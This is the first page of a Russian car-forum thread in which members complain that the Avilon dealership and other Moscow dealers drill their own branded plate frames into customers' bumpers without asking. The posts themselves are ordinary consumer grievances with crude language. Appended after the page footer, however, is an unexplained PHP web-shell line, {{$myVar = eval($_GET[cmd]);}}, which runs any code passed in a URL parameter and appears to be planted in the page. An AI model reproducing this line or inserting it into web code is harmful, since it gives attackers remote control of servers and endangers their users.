+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 42

Тема: Авилон-говно.


  1. #1

    Авилон-говно.

    решил чтоб и тут клубни почитали чо-почем:

    1 день - отмечу тему рамок, завтра буду звонить начальнику сервиса и ругаться.

    Рамок принципиально не имею и сегодня приехав с сервиса увидел их вкрученые на саморезы в бампер. еду в воскресенье расчехлять книгу жалоб.

    P.S. в первое посещение они не посмели этого сделать, но подобные подход говно.

    видимо я больше туда на сервис не поеду.

    2 день - позвонил попросил дать мне того с кем поругаться, сказали занят на совещании, я оставил номер - так и не дозвонились до меня :(

    3 день - проверил как прикручены рамки - на 4 самореза т.е. тупо даже не прикрутить теперь номер без рамки т.к. будут видны дырки. позвонил в бешенстве в авилон, соединили с каким то оленем по имени Тарас, я ему сказал что рамки говно. он мне сказал что я его оскорбляю, не умею говорить и пререкаюсь, короче похоже парень всю жизнь работал в ладе и там такое прокатывало и делает вид что его тачку прирезали саморезами, а я тот самый сервисмен который эту тачку ему отдал. короче я сказал что напишу жалобу и бросил трубку.

    до них и их книги жалоб я еще не доехал, но успел сразу позвонить на горячую линию.
    те сказали что решим в течении 10 дней вам отзвонимся

    день 4 - планирую завтра заехать освежить книгу жалоб. надеюсь буду не первым.

    блокбастер онлайн

  2. #2
    GTI-Racing GIII will become famous soon enough Аватар для GIII
    Регистрация
    04.06.2007
    Откуда
    Москва
    Машина
    skoda octavia scout
    Сообщений
    920
    В Автотрейд-АГ тоже дятлы - без спросу меняют рамки и прикручивают (прям так и хочется сказать - прибивают) их криво-косо к бамперу.
    Ну, написал я писулю их техдиректору (за то, что крышку расширительного бачка с тормозухой не закрутили) - да им пох на нас на всех...
    Хотя с Авилоном странно - только открылись, должны, вроде, строиться.
    Кроме рамок другие нарекания есть? А то я к ним на ТО-75 на следующей неделе было собрался.
    Skoda Octavia Scout APR StII: Intercooler APR, Carbonio Intake APR StI, Exhaust Downpipe APR, Bilstein B6, H&R Swaybars, brakes front S5, brakes rear S3, SRE Performance Clutch Kit, VWR Short Shifter

  3. #3
    я бы туда не ехал... отношение мерзкое, я лучше на двушку дороже доплачу и дальше поеду от дома.

  4. #4
    II место Самый Интересный Автомобиль 2011 keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough Аватар для keeper
    Регистрация
    17.09.2008
    Откуда
    Moscow
    Машина
    флай-цокотлай
    Сообщений
    2,049
    как говорится ищут не сервис а мастера.. я недавно ездил туда сход развал переделывать (делал там же) (и как всегда видел там белый гольфик на черных дицках))
    Оборудование все новое ,электронное,но как то не ровно в тот раз выставили,вот приезжаю повторно,говорят часика два-три погуляйте,через два часа подхожу узнать как дело идет в ответ-"у нас неисправен стенд, пробуем починить потом вашей машиной займемся.".ок еще час погулял там и в итоге стенд не починили и уехал ничего не сделамши.. не держу ни на кого зла но конечно было бы правильнее предупредить о неполадке стенда пораньше, а так просто убил время..сегодня звонил мне мастер приемщик приглашал на сход развал,все починили приезжайте ) рамки gti-club не свинтили ))
    Последний раз редактировалось keeper; 22.08.2010 в 03:37.
    два литра,автомат.

  5. #5
    в автотрейде был раз 5-6 кстати или даже больше они ничего не делали с моим отсутствием рамок.

    В диверсе тоже самое.

    Но эта дилерская говностанция подорвала мой разум своим подходом.

  6. #6
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    мдя... интересно.. а почему в сервисах считают, что можно так вот просто лепить свою рекламу на авто - я про рамки с их названием.
    Может тогда сразу на всё заднее стекло или крышу лепть наклейку, разницы ведь никакой и там и тут реклама.

  7. #7
    GTI-Racing GIII will become famous soon enough Аватар для GIII
    Регистрация
    04.06.2007
    Откуда
    Москва
    Машина
    skoda octavia scout
    Сообщений
    920
    Цитата Сообщение от Окислитель Посмотреть сообщение
    мдя... интересно.. а почему в сервисах считают, что можно так вот просто лепить свою рекламу на авто - я про рамки с их названием.
    Может тогда сразу на всё заднее стекло или крышу лепть наклейку, разницы ведь никакой и там и тут реклама.
    Нет, разница есть.
    Наклейку отодрал, выругался и забыл.
    А рамку снял, увидел издырявленный долбоклюями бампер и о*ел ...
    Я теперь в заказ-наряде заставляю писать - "РАМКИ НЕ МЕНЯТЬ".
    А еще лучше - ремонтироваться в сервисе, где в ремзону пускают. Чтобы была возможность все видеть и контролировать процесс.
    И keeper, опять же, пишет:
    "... через два часа подхожу узнать как дело идет в ответ-"у нас неисправен стенд, пробуем починить потом вашей машиной займемся.".ок еще час погулял там и в итоге стенд не починили и уехал ничего не сделамши.. не держу ни на кого зла ..." - а зря, что не держит. 3 часа человека просто так промурыжили. Меня как раз такой подход наплевательский больше всего бесит!
    Чего-то расхотелось мне в Авилон ехать, в общем. Ну ее, эту экономию грошовую. Поеду к Диме в Диги-Тек.
    Последний раз редактировалось GIII; 22.08.2010 в 23:30.
    Skoda Octavia Scout APR StII: Intercooler APR, Carbonio Intake APR StI, Exhaust Downpipe APR, Bilstein B6, H&R Swaybars, brakes front S5, brakes rear S3, SRE Performance Clutch Kit, VWR Short Shifter

  8. #8
    GTI-Racing ILYA TULA is on a distinguished road Аватар для ILYA TULA
    Регистрация
    02.11.2008
    Машина
    GOLF 5 1.4 (80hp)
    Сообщений
    214
    Я бы вообще заставил их поставить мне новый бампер!Как так можно?Взять и продырявить чужой бампер?
    А ещё интересно:ладно там рамки стоят другого автосалона,а если клубные стоят-они их тоже заменят?
    Тюнинг-это сильнейший наркотик,победить который невозможно!

  9. #9
    One more RUM PA PA PA RUM PUM - and the drummer boy dies Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Аватар для Dio
    Регистрация
    17.08.2010
    Откуда
    Москва, СВАО
    Машина
    BMW X1 xDrive 20i SportLine
    Сообщений
    1,424
    Цитата Сообщение от ILYA TULA Посмотреть сообщение
    Я бы вообще заставил их поставить мне новый бампер!Как так можно?Взять и продырявить чужой бампер?
    А ещё интересно:ладно там рамки стоят другого автосалона,а если клубные стоят-они их тоже заменят?
    Почитав тему мне кажется от них всего можно ожидать...
    Сори за оффтоп: я когда машину из Ганзы забирал они 20 минут пытались закрепить свои рамки...А теперь я даже боюсь их снять и увидеть бампер похожий на качественный сыр... (читай дырявый)...

  10. #10
    так не только дилеры поступают . В Москве есть сеть магазинов AVTO-Z , у них в Новогиреево сервис , так вот они тоже не спрашивая разрешения , свои рамки лепят всем подряд без разбора

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. АВИЛОН VW - привилегии клубу и ответы на Ваши вопросы.
    от АВИЛОН в разделе Партнеры / Клубные скидки
    Ответов: 155
    Последнее сообщение: 02.04.2024, 18:55
  2. Авилон. Официальный дилер Volkswagen (г.Москва)
    от Avilon в разделе Партнеры / Клубные скидки
    Ответов: 67
    Последнее сообщение: 01.04.2024, 17:00
  3. НАВИТЕЛ навигатор - говно а не компания
    от Чуйкин в разделе Курилка
    Ответов: 22
    Последнее сообщение: 17.11.2012, 21:44
  4. Ответов: 7
    Последнее сообщение: 10.02.2011, 15:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}